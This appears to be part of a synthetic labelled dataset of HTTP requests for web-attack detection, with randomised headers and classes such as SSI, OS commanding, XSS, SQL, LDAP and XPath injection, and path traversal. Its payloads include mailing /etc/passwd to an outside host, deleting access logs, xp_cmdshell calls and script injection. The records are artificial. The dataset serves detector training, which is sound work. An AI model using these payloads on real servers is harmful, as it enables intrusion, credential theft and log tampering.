Accept-Encoding: deflate;q=0.6, deflate, deflate, compress, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 17.1.105.246
Cookie: Bexohg=ft3ttwgp7%;dnwlxqcNBo=tuustdinanee 4Atai ]oa;issnaeSma4oxuo=lyoqoet0xsev
Cookie2: $Version="7"
Date: Sun, 18 Mar 07 14:42:47 GMT
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jun 04 18:12:58 UTC
Max-Forwards: 24
MIME-Version: 6.8
Pragma: doiibNn='irtsd'
Proxy-Authorization: NTLM UGFhaXllcmFpZWVlc2VFaTlxbm41enFvb3dEeHNsbmE=
Authorization: NTLM ejBvcXRkeGNyZWV0aXV1QWl5YWNhdGZydW5zcnU4b3IxYW1reXVtTm4=
Range: 430-,2-8084
Referer: /nPoin/GStt/Ttslauon/agni.mspx
TE: trailers,gzip;q=0.4,deflate
Trailer: Max-Forwards
User-Agent: ecohhla/1.6.6.2.2
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42513
Start - Id: 40186
class: SSI
GET /4W7connect/aD3pr/yNhhuznteerhsutoAt2w.png?7aeTLo=aoqcAydoatu&p9aaisrs8sEae9=15300&na45yNdh2s=ok+&smthtunot=%3C%21--%23exec++++cmd%3D%22%2Fbin%2Fmail+++++uscneaaho.com++++%3C++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.hnmwkyuihl.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-15, euc-tw, x-mac-japanese;q=0.9, iso-8859-2;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: l-tqn3, w2C-uueanuet, b2ott-sarsgaa, etga-ioHex, ad3sevoh-oonehh
Cache-Control: max-age=9819
Client-ip: 132.79.199.143
Cookie: whisteoaj=53528;fXqhKWu99NR=sto
Cookie2: $Version="405"
Date: Sun, 26 Jun 05 07:01:04 UTC
ETag: "nsJIJ8dwE41Z_@egNq"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Sun, 14 Mar 04 05:15:25 GMT
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 295
Pragma: ej1hicts='in'
Proxy-Authorization: Digest username="UloTorac"
Authorization: 2izi oEesqes0=Ina6nc
Range: 95170-36663
Referer: /fei9v/cseer/Oeids/a7shne.js
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 8.3; et-le; rv:1.0.6) Gecko/24137533
UA-CPU: 68000
UA-OS: FreeBSD
UA-Pixels: 9646x716
Via: HTTP/2.7 188.215.52.77
Transfer-Encoding: gzip
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40186
Start - Id: 36819
class: OsCommanding
GET /27TlLAdtwcpXYDr/ganarcrbgffi/iVXSIS_0FM6BLDc/ZMN3jK911TbaV/TNTvDN34/c-.8aBSSnsMH/68oufduxrhedidxnmen/4DAduzxAz8yH@g/hos1u5OoVvV4/zLQ9/ro.png?3n6iaosan0czlo4=ussvduyk&JkYeBJ-K6Q=2ee%3Btesvene4r&ptldoh=8&ebsr0occhmerh=%7C+++++cat+++%2Fetc%2Fpasswd+++++%7C&oeteoxeeszohreF=fetfcmd&wrnkroaGbeniy=7622&hd=86&Aft=mailiwe%29&YrABuuZsock_streamWo=%3Ert HTTP/1.0
Host: www.e31etleP.de:477
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-2022-jp;q=0.7, x-mac-japanese, big5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: si='am4dy'
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="089"
Date: Mon, 12 Jan 04 05:38:15 CET
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Fri, 22 Sep 06 21:56:14 UTC
If-Unmodified-Since: Tue, 25 Jul 06 05:04:40 CET
If-Match: "m.weT1rjei6Vefie"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 9.1
Pragma: naet=gXSsthfe
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: http://ar6in.com/05av/uoiDpGu/haxsonf.exe
TE: deflate;q=0.9,gzip
Trailer: If-Match
User-Agent: aeid/5.2.8
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.1 26.230.241.19, 9.7 www.andt.js:6584
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36819
Start - Id: 48257
class: XSS
POST /klTQZTu.bin? HTTP/1.1
Content-Length: 254
Content-Language: sd
Content-Encoding: identity
Content-Location: /fn5pocee/icfu.fgf
Content-MD5: aWlhb2FyaXltdGxvZm42bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Dec 04 18:35:47 CET
Last-Modified: Sun, 23 Sep 07 15:06:24 UTC
Host: 218.174.123.239
Connection: fecsn
Accept: text/html, text/xml, text/plain;q=0.5
Accept-Charset: isiri-3342
Accept-Encoding: compress;q=0.0, compress;q=0.0, identity;q=0.4, deflate
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 103.189.198.113
Cookie: easretlyba6ihln=<div     style    =    "     binding:  url([http://www.tidele.com/script/tl3tehhycH.cfm]); " >;celi=tiewc5Eti7mtnoStms;tthmaThI=bootrwvct;TersDdTcbRreo=tdqrr;CO7Py1nUBsock_streamk=ref7.WPii.3V
Cookie2: $Version="3"
Date: Sat, 27 Dec 08 05:03:50 CET
ETag: W/"k5FlZPfx1ZCahFi"
Expect: oueneeEx
From: oslKrae@1ok4xdre.uk
If-Modified-Since: Tue, 23 Nov 04 21:33:37 GMT
If-Unmodified-Since: Wed, 06 Jun 07 21:18:12 UTC
If-Match: *
If-None-Match: "FVz7FtTksBc8xz8qpK9"
If-Range: "xqb_6.ZV2yEwemz"
Max-Forwards: 053
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM aG9zc3NIa2xzYWlwZGN6c3VuZWlvaWVhQ2FkTmh2YWp0M2hFdQ==
Authorization: pthi nnai4l=Honcoon
Range: 9-39,892590-
Referer: http://ataz.it/cwlLoxr/atean/ihmmt4fE.nsf
TE: gzip;q=0.6,trailers,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.9 (compatible; MSIE 1.4; Linux i386; eass; 6htqreo; btsstpo)
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9341x017
Via: 3.5 3.253.139.110
Transfer-Encoding: identity
Upgrade: tRojr/4.8, ee1/5.0, lcc/3.4, ejHusz/1.8, ar0ma/1.4
Warning: 566 www.m8ftnm.shtml "ewDNnc" "Wed, 17 Jun 09 23:20:04 GMT"
X-Forwarded-For: 48.75.5.201
X-Serial-Number: 3811622
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asod8ileineh5q2=typ5UgA.mo&aimmwsos0n=8501775034&itYlht9nht8e=giL&towFeronSiaerai=ex-&svseiEbtf=iom2&Hefnbs=4ort2uyc&as7ti=3173228710&clYNRvD=7305&Cbiaysr=499645592&NKPB4=ba&Rsosiehs6ha=4688497&ehy=asefuegstea0ugjrg&eognxg=6dimgazmbts&bDqdsOeeaddAn=4etde

End - Id: 48257
Start - Id: 48373
class: XPathInjection
GET /mpmochaO0eT92npKJGn/rbot9Ns6ttl/9x/tZeu30y@Y/ifzI24EyD0EgFoOb0IG/7GJ_e-3sh/fXK/sziq4p4hnLRq7umY@/iXttbfqxK_N3/eVoG6NMHXyNoO8k7cq/oyiDfzKr2G/xVg47rcY-2HE.php?R2zp=hoiSs HTTP/1.0
Host: 122.100.184.41
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7, euc-tw, x-mac-roman
Accept-Encoding: identity;q=0.8, identity, compress;q=0.9, identity, compress
Accept-Language: 8673  or  1<  Nnao/ser/hkH1u/child::text()[position()=883] or 00='] | /* | /foo[bar='
Cache-Control: max-age=5909
Client-ip: 188.64.206.7
Cookie2: $Version="413"
Date: Sat, 15 Jul 06 13:44:31 GMT
Expect: dqa6O
If-Modified-Since: Sat, 12 Feb 05 08:14:23 GMT
If-Range: Wed, 26 May 04 06:37:44 GMT
Pragma: Shnuzai='gonhTns'
Referer: /asie3ip/Hntnltl/ybynuI/ohteT/utdekIa.htm
User-Agent: lsn1mm (cvnPrU; kruk-XBriO; pcRaC0o0@r)
UA-Disp: 373,940,32

null

End - Id: 48373
Start - Id: 43312
class: OsCommanding
GET /aitt3odw45d/toRkan3suTfut1btatco/e8Ki4ugSC/i6LhS/Z7/ubr/etecihiirtsrbj7frro/@h@/o6avideSoeeciN/qceceaiicctortcnao4c/iimubd4oiuejnlhhdsg/e28NzZt2T5f4JJMS.css?aooudipao2aeI2=751&RvWwwhereN-VXC4=t+%3Acmdzmaphnmn%7Eh&yei7ielAubbh=kqedeHrhcOtmott&dY=%250arm++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log++%3B&btWitwgijzgoce=c6miXYA&chl7ds5nNii=18684613&orbrhnr0ngepv=6lfreqoheirro&etsrgAdnt=8Zz6Nxy&Z77.nF=036337812&Akti7tns4atMIua=09026695&uS=h5syora&a9odSsok=htpassmu1%3Ct HTTP/1.1
Host: www.tif94mAe.net:1650
Connection: keep-alive
Accept: text/*;q=0.1, video/mpeg, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sr-s00eh, lrit-mooZoe7a
Cache-Control: max-age=44946
Client-ip: 39.60.249.69
Cookie: FF_include7=98986;ralunn=oz;f7rx2mswtae0tTr=5xh4Ut;gldtHux=inrT ls?selectupositionaperln
Cookie2: $Version="975"
Date: Mon, 27 Dec 04 03:54:32 UTC
ETag: "8tYmBLFfcCT-OoAu"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Mon, 05 Nov 07 12:07:17 GMT
If-Unmodified-Since: Thu, 12 Jun 08 09:10:20 GMT
If-Match: *
If-None-Match: "nUppEZN3GQl8plCQ5OuZ"
If-Range: Thu, 04 Feb 10 05:59:42 CET
Max-Forwards: 910
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic U3Nub2VzZ3U6MXRsNmFlaG8=
Authorization: alkai vodbytu=ohto
Range: 398265-
Referer: /artaa/eoxo/anmeri/dlib.zip
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/9.6 (Windows; U; Win 9x 2.9; ra-9C; rv:2.7.3) Gecko/59110279
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: erSzw; uasoef=xli4As
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 0027347
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43312
Start - Id: 39765
class: SSI
GET /OiJes.sh?sairAeewH2dul6=efu&n8iieeidce7tyh=98296600&snwilFf6fuld=uxledeinsPeent&1u0rlr3dxSo=379&cAqeo=ftpUldIpasswdrauo&fot=oKYw&Asoihlmdests=77815&epa=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&roe7w=e%2F%2B%24nr+eegtYbia+mR&lDmnNaddl9e9=38&lua5bp=e1cufrila&inr=181403474&sthl9abr6fe=%5CEoS&ea6rneknwtc4SS=876790 HTTP/1.0
Host: www.qs4nd1h.com
Connection: keep-alive
Accept: video/mpeg;q=0.7
Accept-Charset: windows-1251, windows-1258, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 53.18.205.114
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Thu, 12 May 05 11:01:25 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: sn1i
From: ue5Iadae@vsTB2l.net
If-Modified-Since: Thu, 26 Mar 09 23:57:39 CET
If-Unmodified-Since: Fri, 18 Jul 08 04:30:07 CET
If-Match: "0BJsXYjYrZUQ6TdH"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: "rA0ty3@TnAKCuwNi7"
Max-Forwards: 075
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="3FB8f7FE7A2B56D1Ebe41b8aaE2dea0f"
Authorization: Digest algorithm=lAezelru
Range: 42-82,601-32,-86
Referer: http://fnwnl.de/RdSdSIn/hmse/kss0bts/Ea7sht/tssoT61r.pl
TE: deflate;q=0.2,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/1.4 (X11; U; Linux i386 7.5; of-nt; rv:9.5.4) Gecko/25741761
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 1.3 www.Qrhtldw.js, 3.1 www.3agkmt.htm
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39765
Start - Id: 48282
class: XSS
PUT /oedajbfl/rh2eu3z7jKFlm/nleEa7/4koperkw7nntiLs/oe/gzngfKJ.pl? HTTP/1.1
Content-Length: 130
Content-Language: elrt,isiss9B
Content-Encoding: gzip
Content-Location: /ll6xa.pdf
Content-MD5: bW41aGFwdHhzN25uOXBlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 May 06 06:23:30 UTC
Last-Modified: Thu, 20 Sep 07 21:58:06 UTC
Host: 173.220.71.68
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: unmaoo-mi;q=0.1
Cache-Control: no-store
Client-ip: 194.139.58.173
Cookie: 1iheoc9=685967;ndTzIE=oot;d7aznslSrjipytp=<img src   =  "   livescript:[alert('mraceb7');]  "    >
Cookie2: $Version="589"
Date: Sun, 14 Jan 07 19:34:36 UTC
ETag: W/"164Ncu4AP.BYqPAi8"
Expect: sthK
If-Modified-Since: Wed, 02 May 07 08:25:19 UTC
If-Unmodified-Since: Fri, 14 Oct 05 22:01:16 CET
If-None-Match: "NRGzJC45K-M7.UbucRx"
If-Range: Fri, 30 Jun 06 24:16:58 UTC
Max-Forwards: 46
Pragma: no-cache
Authorization: NTLM b25zaWNJdGNpb2FlaGx0ZXhyY0VocXRuU3NKd2V0Tm90cGRpd2h2NG9ldG9vdXQ=
Range: -23954,652-
Referer: /intr/ytsy/idnSsHow/4derw/oqbsohoe.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 4.9; ho-eL; rv:8.6.4) Gecko/38867102
UA-Disp: 5100,8264,8
UA-OS: WinNT
Transfer-Encoding: li55r; l3meezH=anIdj
Upgrade: 11ssaf/1.6, zAt/4.0, AaEt/1.6, 7sg/3.8
Warning: 062 59.37.73.19 "Srtle8yh9Tentv" "Tue, 09 Mar 04 19:30:59 GMT"
X-Serial-Number: 994751
----: ---------------------

leh4va2ema=\Sp:kRdn;u5i&dm9a2tg=n(j&gtnbol1itXraneT=muenMynaI&wiefuy=miuo&JA@Q=uselect\ |oe( s &3e8io=ubodyH?wUnmn

End - Id: 48282
Start - Id: 38058
class: LdapInjection
GET /YtpPo2xkQform/sacDUtc9Dw7Qe/aznqw1pt0o/qrow/mWi/i5rdizSEaha6/pqulSAiteo/9e@5f.aV.d.png?6pdCebeenj2x=n3Dgn&nstrotiorel=p4oh&kRbUraOczoZM=ol%40se+fc+&DsrYv4I13=y6iN&nsodnIe=Dnsel0oa&mheitl=nT%29%28%26%28objectClass+++%3D+y2*%29&RsoTcoce=Hdzie%7C&oeHbt7ineth=7390&8ary1e=bite&oluoinucadoo=gtmiw HTTP/1.0
Host: www.danyt.com:317
Connection: xeLr
Accept: */*;q=0.1
Accept-Charset: iso-8859-8;q=0.6, iso-8859-5, x-mac-hebrew
Accept-Encoding: compress;q=0.1, gzip, compress;q=0.0, deflate
Accept-Language: s8-nrtmap, leshdaeL-tt;q=0.8, 7ocrt8y-sTa;q=0.5
Cache-Control: no-store
Client-ip: 26.50.164.170
Cookie: oiqrozW=jzqlwocei;agogpdtraaiu=56;thobslqe=t5a;xRgG5Dyselect=5482;soRmLnOmqatqdah=06595650;7aqeuuoowrv=4302081613
Cookie2: $Version="7"
Date: Sat, 11 Jun 05 07:08:37 GMT
ETag: W/"h1oRPtR-U-jQCsTW7"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 03 Apr 09 07:52:24 GMT
If-Unmodified-Since: Sun, 16 Dec 07 01:53:47 GMT
If-Match: *
If-None-Match: "vG0-gZT3dhrjX25bEeV"
If-Range: *
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: -5,-848,5-
Referer: http://www.ce4s.cz/Czutvn/anglkwEs/hckip7/hiSsrs.jpg
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.3 (Windows; U; WinNT 6.1; e7-rJ; rv:3.2.6) Gecko/28891354
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: tWq/1.4 174.205.206.12
Transfer-Encoding: ieiyT; tesamaNh=xy2s
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38058
Start - Id: 36907
class: LdapInjection
POST /Wo/155za-NsGr1ScsnGRsO2/dSDQPGY5roVSyGR/fv75C/oj5VFgJ/VW@CMU8o5m/nP3M/evlacyfe/tisiye/ieeoe1mii/6.4.sLZexecnph-F/tGe16WmOTtXrChP@.js? HTTP/1.0
Content-Length: 313
Content-Language: eTtdat,yro,bfaag
Content-Encoding: compress
Content-Location: http://rtRostji.be/rhtet.doc
Content-MD5: aHNsWXkxMmF3aW5pbmlsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 May 08 05:29:26 CET
Last-Modified: Fri, 25 May 07 06:00:44 UTC
Host: 122.230.65.208
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 0og-sl;q=0.3, equij-nr7zep
Cache-Control: no-transform
Client-ip: 52.204.101.18
Cookie: S2kR=snlS;n6toonuheA=q6qdVrbp;giaafaseoa=xscriptSr;elWIasoritc0f=whREnnD0dwseeepassthruh+k;etlyt=549297010
Cookie2: $Version="8"
Date: Tue, 29 Dec 09 09:07:24 GMT
ETag: "xPaZn8bGGwCMl.Xl"
Expect: 5nir
From: Do6baraA@811ntp.st
If-Modified-Since: Wed, 26 Aug 09 09:46:37 GMT
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: *
If-None-Match: "9BPvDR-2jxecJdF-mrzu"
If-Range: *
Max-Forwards: 31
MIME-Version: 7.4
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: /axhoss/etso/1uskat/obmTwc/iarhdowA.jpg
TE: trailers
Trailer: Warning
User-Agent: etzjgY http://www.q8ell5n.be
UA-OS: Win98
UA-Pixels: 015x0585
Via: 1.9 39.111.132.232
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o0atsAsu=)  (    |    (displayName=had*)   (name  =  had*  )(  mail=had* )&yrneebpTtsTa=31&Uorspnor3go=e &2hfuCha7c=0iIvQzP2OH2g&caL1uoraro=gio&GVW0_zH@Fny_=wi;$t:&VyCL.perlHgXJpsr=kkaVdGJP&nph-h08=dil&aasnrrborla=ttuisds&hdndzon=1877838010&pj0aeaa6=aidg&5Race=4tlm1Anosrshndocumentr

End - Id: 36907
Start - Id: 46847
class: XSS
POST /oAieadoMoeauvonoa.sh? HTTP/1.1
Content-Length: 179
Content-Language: ww41O,dsT,7idpsbgf
Content-Encoding: compress
Content-Location: http://www.zfr3is.gov/asreei/iidter/sdfarrSd/Meer.php
Content-MD5: a0x0dHVhOTdoNm1tc3IxUw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Dec 09 08:03:06 GMT
Last-Modified: Mon, 31 Aug 09 17:59:35 GMT
Host: www.usuffnea.com
Connection: l3gjB
Accept: */*;q=0.9
Accept-Charset: x-mac-ce
Accept-Encoding: deflate;q=0.5, deflate, identity;q=0.3
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 175.15.203.198
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Wed, 02 Mar 05 19:28:39 GMT
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Thu, 04 Jan 07 10:27:19 CET
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: "SVVFEErnT5FdCRBeX2a"
If-None-Match: *
If-Range: "6w_gdrs.A4q_We2Ez.Fc"
Max-Forwards: 89
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: NTLM dGpoMnJobmZPYWFkZ290bGVwc2hhcnVpYnQ2Tm5rb2VvbnQ=
Range: -85
Referer: /r1r5inte/iMTicRse.jpg
TE: trailers,trailers
Trailer: Referer
User-Agent: U0imec9ns/7.6
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/9.0 3.132.172.113, 6.0 www.sradi.js
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8ei9rht=<img     src    =   "    javascript: [alert ('3e');]  "  >&IGoptdigy=lPhiIHraV&tnetcatK_WNhjBMl=lEntie(haaae&rmckxerdoRil=34921&phniEbcaoaw=ae3

End - Id: 46847
Start - Id: 41157
class: SqlInjection
GET /Xenor/l_/nb7AugePC-J/1zRAzivK.tQ/eIE3OMx1B@/eue/dnonehhelA/luljemttoefutreo/soseeau6z/WFnT/sglD.jpeg?i8Vln6hrunE9Iln=262631578&cclwri=eoyrEC&thnole=weaIechogs&letnc0aEk8s=hnHe&Cshutdownrcp5scriptchildH=exec+++xp_cmdshell+%27%22Ia%22++++%3E%3E+++script.vbs%27 HTTP/1.1
Host: www.kYbediruvo.net:8579
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: Itaoevn-xiirlh;q=0.3, stremgw-gibs;q=0.8
Cache-Control: no-cache
Client-ip: 7.41.230.40
Date: Tue, 04 Jul 06 01:17:49 UTC
Expect: rwThi5ei
From: jrln@tnernm.biz
If-Modified-Since: Sat, 01 Nov 08 14:18:56 UTC
If-Unmodified-Since: Mon, 12 Mar 07 05:56:57 CET
If-Match: "bV_J1hfi.eJREC2hJE"
If-None-Match: "quO5x.ExDCNRoicCz5k"
Max-Forwards: 8
Pragma: jehscloi=tyorGl
Proxy-Authorization: nmtsns c9neqdtn=mecete
Authorization: NTLM dGVzdDdsb3hHcmNkeWFjZHQ4ZHF0c3RlaXhzY3NlczBmaW9kbQ==
Referer: /mfnLfH/tweyu.bin
TE: trailers,gzip,trailers
User-Agent: Mozilla/0.1 (Windows; U; Win 9x 0.8; i2-o1; rv:3.9.9) Gecko/93790865
Via: 0.3 www.i02ndtyd.jpg:95
Transfer-Encoding: deflate
Warning: 341 www.hatlzo.htm "y5wl" "Thu, 19 Jun 08 12:12:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41157
Start - Id: 45380
class: PathTransversal
POST /ee9bxtzt8mac7es/oTv9WdHWRayDp9OHCb4R/9Ju31x.passwd/yincludetWx0.js? HTTP/1.0
Content-Length: 231
Content-Language: uhNgioch,o4rbekt,cyolr4
Content-Encoding: identity
Content-Location: /dzfjt6e/wtbcEetn/tnelBt/rttl1b/eZhHe.gif
Content-MD5: Q29pZGFzZXN5Y2lvcmVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Mar 07 02:30:05 UTC
Last-Modified: Sun, 11 Jan 09 16:06:03 UTC
Host: www.83ileeodr.de
Connection: close
Accept: video/mpeg, video/mpeg;q=0.2, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 219.120.83.225
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Fri, 15 Apr 05 20:53:25 CET
ETag: "wVrkReDNDk8Y9C5UF@3O"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: "7SH3nvyeJOHQ_hGePS75"
Max-Forwards: 396
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: NTLM cmR3dG9iYXVhTXRMdHVoNmVzb2dyaFZkVGxodGVIYXhlYWVsaA==
Range: 0524-
Referer: /dsEnipeb/eoiA1v/sbXn/r7Yifllr/unrroata.exe
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: QnlwaAsM4tLiIocD6e
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-Color: color8
UA-Pixels: 789x027
Via: 2.3 www.vt43f.tiff
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

qdb=..\..\..\..\WINNT\system.ini&jemiu=etsotc6eSzrdA~&OUTopsth48rtq8i=707174&no0htewe=enEolciglsPae&7-z5osjZHKFY=96Ll9GG9DS&ctwdii6ute9i=aktlce&fh6vinde=6574179707&sUueb4n=0173&ntgdeTeoxkla1gt=5134124&nb=iitr1dlis&xm=64

End - Id: 45380
Start - Id: 48952
class: XPathInjection
